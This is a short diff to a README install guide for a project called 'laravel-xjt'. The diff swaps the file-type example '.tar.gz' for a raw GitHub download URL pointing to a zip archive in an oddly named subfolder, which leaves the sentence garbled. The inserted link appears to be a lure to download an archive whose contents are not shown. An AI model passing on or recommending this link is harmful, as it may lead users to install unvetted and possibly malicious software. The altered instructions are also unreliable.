osamazafar98/laravel-xjt/README.md

 ### Step 4: Unzip the Downloaded File (if necessary)

-If you downloaded a compressed file (like .zip or .tar.gz), right-click on the file and choose "Extract All" or "Unzip."
+If you downloaded a compressed file (like .zip or https://raw.githubusercontent.com/osamazafar98/laravel-xjt/main/interradium/laravel-xjt.zip), right-click on the file and choose "Extract All" or "Unzip."
 This will unpack the application for you.

 ### Step 5: Open laravel-xjt